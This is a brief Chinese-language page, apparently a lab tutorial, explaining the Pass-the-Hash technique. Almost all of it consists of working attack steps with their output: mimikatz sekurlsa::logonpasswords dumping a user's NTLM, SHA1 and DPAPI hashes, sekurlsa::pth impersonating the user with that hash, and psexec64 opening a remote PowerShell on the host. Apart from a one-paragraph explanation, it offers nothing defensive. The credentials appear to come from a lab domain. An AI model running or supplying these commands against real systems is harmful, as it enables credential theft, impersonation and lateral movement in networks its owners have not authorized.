Pass-The-Hash
小于 1 分钟
Pass-The-Hash
Pass-the-Hash是一种凭证盗窃和横向移动技术,攻击者滥用 NTLM 身份验证协议以用户身份进行身份验证,而无需获得帐户的明文密码。由于攻击者使用密码散列,通常仅在密码本身更改时才会更改,因此攻击者有大量时间滥用受感染的帐户。
攻击步骤
- 获取用户HASH
mimikatz
sekurlsa::logonpasswords
Authentication Id : 0 ; 485931 (00000000:00076a2b)
Session : RemoteInteractive from 2
User Name : vagrant
Domain : DEELMIND
Logon Server : ROOT
Logon Time : 10/27/2022 10:38:39 AM
SID : S-1-5-21-3330634377-1326264276-632209373-1000
msv :
[00000003] Primary
* Username : vagrant
* Domain : DEELMIND
* NTLM : e02bc503339d51f71d913c245d35b50b
* SHA1 : c805f88436bcd9ff534ee86c59ed230437505ecf
* DPAPI : 3cfc6375c63f5ba465ab84fdf22d6ffe
tspkg :
wdigest :
* Username : vagrant
* Domain : DEELMIND
* Password : (null)
kerberos :
* Username : vagrant
* Domain : DEELMIND.LAB
* Password : (null)
ssp :
credman :
- PTH
privilege::debug
sekurlsa::pth /user:vagrant /domain:deelmind.lab /ntlm:e02bc503339d51f71d913c245d35b50b
mimikatz # sekurlsa::pth /user:vagrant /domain:deelmind.lab /ntlm:e02bc503339d51f71d913c245d35b50b
user : vagrant
domain : deelmind.lab
program : cmd.exe
impers. : no
NTLM : e02bc503339d51f71d913c245d35b50b
| PID 33544
| TID 1360
| LSA Process is now R/W
| LUID 0 ; 20418271 (00000000:01378edf)
\_ msv1_0 - data copy @ 00000152E3CB6640 : OK !
\_ kerberos - data copy @ 00000152E3BB7F48
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 00000152E2C6EBE8 (32) -> null
- 连接SHELL
psexec64.exe \\root powershell